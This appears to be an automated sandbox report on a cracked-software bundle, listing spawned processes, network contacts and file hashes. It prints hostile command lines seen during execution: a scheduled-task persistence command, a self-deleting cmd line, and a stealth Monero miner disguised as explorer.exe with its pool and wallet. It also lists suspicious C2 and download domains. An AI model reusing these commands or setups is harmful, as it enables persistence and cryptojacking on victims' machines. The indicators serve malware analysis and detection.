"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe" -a

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4388 -ip 4388

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1144

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1280 -ip 1280

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 352

C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 1172

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.30:443 evaexpand.com tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 30.109.116.89.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 remotenetwork.xyz udp
US 208.95.112.1:80 ip-api.com tcp
RU 186.2.171.3:80 186.2.171.3 tcp
US 8.8.8.8:53 startupmart.bar udp
US 8.8.8.8:53 best-supply-link.xyz udp
RU 186.2.171.3:443 186.2.171.3 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 2no.co udp
US 172.67.149.76:443 2no.co tcp
US 172.67.149.76:443 2no.co tcp
US 8.8.8.8:53 3.171.2.186.in-addr.arpa udp
US 8.8.8.8:53 76.149.67.172.in-addr.arpa udp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 live.goatgame.live udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 oldhorse.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 172.67.149.76:443 2no.co tcp
SG 37.0.10.214:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
SG 37.0.10.244:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
FR 51.210.150.92:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 54.37.232.103:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 92.150.210.51.in-addr.arpa udp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 103.232.37.54.in-addr.arpa udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
MX 31.210.20.251:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

memory/2788-0-0x0000000000B50000-0x0000000000B68000-memory.dmp

memory/3092-6-0x0000000000A10000-0x0000000000AF5000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

memory/212-18-0x0000000000B70000-0x0000000000C55000-memory.dmp

memory/720-27-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

MD5 51ef03c9257f2dd9b93bfdd74e96c017
SHA1 3baa7bee4b4b7d3ace13409d69dc7bcd0399ac34
SHA256 82a022b29bda763ef9f2ce01c82c82e199182d1d0243cca9811eccc1d993cecf
SHA512 2c97e5d08c9be89ca45153511e0976abfabf41e25d4187dcb7586ba125b6d8d763b99e79043ac1504203c26c7ab47a9246d9a0235b469f6c611703d4e2ae00e1

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe

MD5 7126148bfe5ca4bf7e098d794122a9a3
SHA1 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256 f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA512 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48

C:\Users\Admin\AppData\Local\Temp\RarSFX0\JOzWR.dat

MD5 12476321a502e943933e60cfb4429970
SHA1 c71d293b84d03153a1bd13c560fca0f8857a95a7
SHA256 14a0fbd7eab461e49ee161ac3bd9ad8055086dbe56848dbaba9ec2034b3dea29
SHA512 f222de8febc705146394fd389e6cece95b077a0629e18eab91c49b139bf5b686435e28a6ada4a0dbb951fd24ec3db692e7a5584d57ffd0e851739e595f2bbfdc

memory/2288-65-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2288-68-0x0000000000400000-0x0000000000983000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe

MD5 8902f8193024fa4187ca1aad97675960
SHA1 37a4840c9657205544790c437698b54ca33bfd9d
SHA256 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512 c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938

memory/2288-70-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2288-84-0x0000000000400000-0x0000000000983000-memory.dmp

memory/4644-85-0x0000000000560000-0x0000000000736000-memory.dmp

memory/2288-87-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2288-88-0x0000000000400000-0x0000000000983000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

memory/2660-99-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

memory/2292-112-0x0000000000AB0000-0x0000000000AD0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

memory/3592-123-0x0000000000D50000-0x0000000000D58000-memory.dmp

memory/2292-125-0x0000000001050000-0x000000000106A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe

MD5 f250a9c692088cce4253332a205b1649
SHA1 109c79124ce2bda06cab50ea5d97294d13d42b20
SHA256 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882
SHA512 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e

memory/3192-149-0x0000000000400000-0x0000000000667000-memory.dmp

memory/2288-155-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2288-156-0x0000000000400000-0x0000000000983000-memory.dmp

memory/2288-157-0x0000000000400000-0x0000000000983000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\potato.dat

MD5 b6d8456dd71a141887ff55c3fec58b8a
SHA1 e45af060b95194f9b4d52ad0ad52591f0cf95e24
SHA256 cf5e6a7e14e41fdf5976c73ec8d618cb813358803fbb95051950a5431b9b219f
SHA512 eba967f519d9f19d5b31a7faca19105aa150b615249089f5068c0e264decceaef45c1e8016526529c2a9e05c70c6e288c3573b463ef5395fda6131420b9f38a1

memory/3192-164-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4388-163-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/2660-167-0x0000000001570000-0x000000000157E000-memory.dmp

memory/2660-168-0x00000000015A0000-0x00000000015B2000-memory.dmp

memory/3192-180-0x0000000003AC0000-0x0000000003AD0000-memory.dmp

memory/3192-186-0x0000000004560000-0x0000000004568000-memory.dmp

memory/3192-173-0x0000000003950000-0x0000000003960000-memory.dmp

memory/3192-187-0x0000000004580000-0x0000000004588000-memory.dmp

memory/3192-192-0x0000000004780000-0x0000000004788000-memory.dmp

memory/3192-193-0x0000000004780000-0x0000000004788000-memory.dmp

memory/3192-189-0x0000000004620000-0x0000000004628000-memory.dmp

memory/3192-194-0x0000000004A30000-0x0000000004A38000-memory.dmp

memory/3192-195-0x0000000004930000-0x0000000004938000-memory.dmp

memory/3192-196-0x0000000004790000-0x0000000004798000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 f605f37b631b7ef1190a8e294121056a
SHA1 0ba9ec5226bd03b308f47a550f290ac284481c02
SHA256 956de59e90df0da7edb5f17baa21ac7150daa892197a63aeff24ce3951bf5cc3
SHA512 5b03286ef60f86bdabba20a7278ff14c9f86e30d622596825f5bf418f7778438224c4736e9360b866d266d2aea271143d135f5d364e7c6c36c797558e8dee4a7

memory/3192-209-0x0000000004580000-0x0000000004588000-memory.dmp

memory/3192-217-0x0000000004790000-0x0000000004798000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 c0afa1ce80c2c414f9bb4644977e6c76
SHA1 635e333561061a0df87e330df8c2e84896cf9477
SHA256 42dd35b5f0bcefa0cb2b05b8886462d849ee3e8822eb592a38f75200bef78b29
SHA512 9117143495c2796a9847d67119120fb499635bcab671650af996e6145d64d22979643919fbf2e309e355266bd7a9d2baaaeea6de9e114b1f797757f3cdd0ea16

memory/3192-232-0x0000000004580000-0x0000000004588000-memory.dmp

memory/3192-240-0x00000000048C0000-0x00000000048C8000-memory.dmp

memory/3192-219-0x00000000048C0000-0x00000000048C8000-memory.dmp

memory/3192-242-0x0000000004790000-0x0000000004798000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 3bb4b4505ce6c5738c72dec43ab484f5
SHA1 683df579e991662847c47512c76f2d63cc71ffe5
SHA256 2aa3799965a5ac0c627169a3b0f4fb35129ea0c8183e32d68c9ae3c363ab3aa5
SHA512 aa1ca7b7af8f00738ad1c9b38dd8fc211e0c585c422af3fa54607eafc313c14af11df4a17208837fdae790c37ae1748b7bcefac30b6b6858d0f1ec080f8884fc

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d

MD5 1842e65634f9f62d8bb51b0d914e4f47
SHA1 ea58c7d9d5d6c269de19cd8ad3fc9b451fcde7e6
SHA256 26e0a6441dd096bf405a25648aa68c4a9ec20c12e6268413c1b303825a1e6bec
SHA512 4a50e8c42da257287055f88369528eca7784ff0fb8b749b60f4324b312e85a6f6b500179178a9e382a93518650920e45fb0c985ad58caf31269cae05219e8661

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 9bca4bb723492631598e89c7db9177a3
SHA1 22d73a5b0c27af1d016df8518e7786e3c1201399
SHA256 ca8847bba444075938a8f2c7b29e3ecee3362a850a6b9f3b4f9d66532e731c8d
SHA512 6b6e73986e2217258442156c3c9c3f9b8892d804fda1434f6856c675795227797c88b26f08c475965518acf8f4e714f1ed199d985fa1a189c3a919c6923dc4af

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 4a004655563d2e95bea768490e3acfa8
SHA1 c51e6a524ba74e0cacdd2d4c6a9f02f16d51210b
SHA256 25222fa360b5fd1e03473c31f1aee17aea21d2f70b5c1a3065ab7a96e9eb5599
SHA512 3519c57a0d11f938a93bc37faa4b911c5ea1f4329b4c09129ff7d401f1c7631f2d009cf117fd7bb10d6942af47c418b8932cd742e57a60f9cb49019a0c5ab6b8

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 48b6e48be491b062f6a0d939ca66fbfc
SHA1 0f2d8430072da3af55040bdcf67e2b8e96b229b0
SHA256 0eb3cc70d19b9523295e17561720f312901a24a52084cb4c2790eb0d973095a2
SHA512 53df084a7a04839507824711b3c5ab6c2f370eb1e13dd725b489d46cae1c8f6f0017cc0f9b6a2d043d18ebc0d22c3a886c4bced0aea2e17e2d58bf6eb7691c31

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 badf5bb987052f11491f39872ffd2169
SHA1 13ba38f04fd3fd4e204464d808b1cbcbb8b5f7a1
SHA256 daed536fc3bcd25f337d5f48e9a6435f5eca0e89c18410659fb8540e0c095eb6
SHA512 3b160543de68bc536e2c396fd3601a29ac4d3a535ebf90900a3cbd5a7d1831445ea90974cc3570924b3ce30fa42ae81dfef1ee065732ff7e6180ca4ee5c2b12c

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 508ba0fe68175e182e5e14696119a9bc
SHA1 570d750e200f9715259abf48e5c31638e3a50d51
SHA256 e49b5782d78b7a99c21697a208396f38fe7535ec7a8db6f01e7bd24f86b62848
SHA512 1a72742189ce2f321bff35321b12e6161a9d110dd6820e7df6de30b96835928302c3c129f33b64ea189fb6fee071cbab12a6c954e588de223d713bca0196c5b8

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 24433079eb159fdce544f6a097ab1242
SHA1 0a8233bc76442383c2743e0962423b429bb7bfc3
SHA256 183713c6b7c759ff2958341dd8f6d95a9ed69cce2d58d6788a90bf2f423be11b
SHA512 c818889cffa0f582b4933897ae2d4484d1202484ed467b6c69daeb0ec80a93432b25dcd8ba8c72846632c3c57185b5b5ef02e41fa7de71747337a2c1061f2a24

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 9d3072fbbb780c2b6584e0611445304e
SHA1 e700df586350b43928d099ce4273ee47357ab1c9
SHA256 26b45ad09979a87d71923dac6576609caa94639b9261f48723e6dfb48f8dd069
SHA512 d243c02cd4b7638465b96cbdc06b068f67e81684e14ce6dd36e5b2395e01ff000e39e1bcabd94932c5df883617e90bc0ec1197b6730b2d6790a1756e2fbcba28

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 d655a9a0a5949af145903267d3de4dcc
SHA1 1c5d7526835eb963b14cc55238ba80afaefd1ad3
SHA256 1a282b415fdd26b43b120a70bc41f4e3f2214d07b739a4f694c476f2c44320c6
SHA512 2e33690dd22878e9dff391eeb5111edb29cf8cdb8a4b022828362c78c889d1a275765342890c4e483757d1bc9f11a1c82f0be3a7791cf3a9106fd3f6019a9a74

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 211353552e7001eb427f834fd0f8732e
SHA1 32b990884120e6710d4714c6a2825f4a7da68513
SHA256 0f38ab220f2c093272f6dc73ffae476568b450aedba194a3d08504535f39ce6d
SHA512 1c27e2a8fbd9a099c8daf195c3ccac3025dcfa2e0794b98ae2156b6cbb7028224d773f91b9fd6654a20e2ef9761859e4b4b7a58b9c7f590488c4e8f6fba80087

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 d25f8d4f11fa06b0a0c7924aa7e62bd1
SHA1 c37dd0cfd33abbd9e142af343f855444f8dc2eaf
SHA256 52624dd8cc8593ebcc06e6c81260fe5857bc68e3f52242884db957f81def0630
SHA512 c7f59de9b75d49f74f99b3c4e8548812206175b40c1f62ee84aa7c61c6046df3dc7e67b6769a51819886a4f2aecf5d379334e2deb3feb42e22dd242872627ee0

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 9c0b4e94b57eb9472488a697c93d4247
SHA1 d83c839d80778e2c70050212c672bd0199f068b2
SHA256 537ae468423b64e726bdc282ef30fb18b261dbc21af4884a7c7eac4b1fe7bada
SHA512 d71e105556c327dab0821549d59303805780cf8ad0d1c87400dd1ee366cab98ecceae9e7589f2c2a1a8b026a8a0f65067e8f883551149b167a17d36e2a62028a

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 9f8308f1eb9ad6bedaaa35c7941bd187
SHA1 99ccbb847c19728ffc1eb0364e7eb29bd67a8853
SHA256 da7122cf85469966f2293a2cf9420026aed60ae9a952beedd49ec4f60dc97513
SHA512 6be005db3ae6f24d43f4be2bf832b45d75618ef7e23634ef818f5489a426c126dc365342b7a4b1414a25feca88817e4043946656ae2e9592d3dc55fc6f22c922

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 11e37a591df78e6a99b629d0c3aac0e1
SHA1 c01bf74778f858cb87f9fb09f9babb9ff577c6f0
SHA256 d2c70f30abf503b663e7f9f34b6c90f7f59ac202d94bc0cb54ecc1ce30e29072
SHA512 01d8cbceff71f62883b37e9d63a6fe725eccea2ea56b5e1b54e19485d1795980f5059be037ed31b8d59d92504a2593fe793264ac7184af6ddbf4d6bf1b2c5140

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 a10d0140f399e5a9f39b26a38e5eeca9
SHA1 72c64926775139e60f12e3e0fa1540f68e01725d
SHA256 2de64fd488c2aca77de784ad75e567b00f7b648f15edadffac826fa9f04d5477
SHA512 c24ed707dadb4d45f991a0cbbce4fb252396ecbdef4624f2f30945852f65b148e8dd5b77a9f722d596fb0a97fd32dd02a943be2deacdd7254f0abdfdf5135f62

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 b796f58d8a7bfa96cbd6dbd2f4618ac8
SHA1 664d7f530aa7571ad1576c7cbf6160b3bdc22250
SHA256 dff590958b22e06e9dfa8b7e0380325f9233e6017608394efa40c62143a12abd
SHA512 a0c6013ea89690cbc65a08466e0c3a0cd500aa8044ace5d94316550c2f931f6e960402e05cccc9489425ce4869b0a2ce0c832e356b5666f65d5c4474eb7427e8

C:\Users\Admin\AppData\Local\Temp\RarSFX1\d.jfm

MD5 29f1917bcc5f8e57a183b7e322a5538d
SHA1 70a113da658dc96fe79defbf663103e06078647f
SHA256 d0e02a1b9bc6559b10383907e90a2a9b3a519607205354effb54e0e603438322
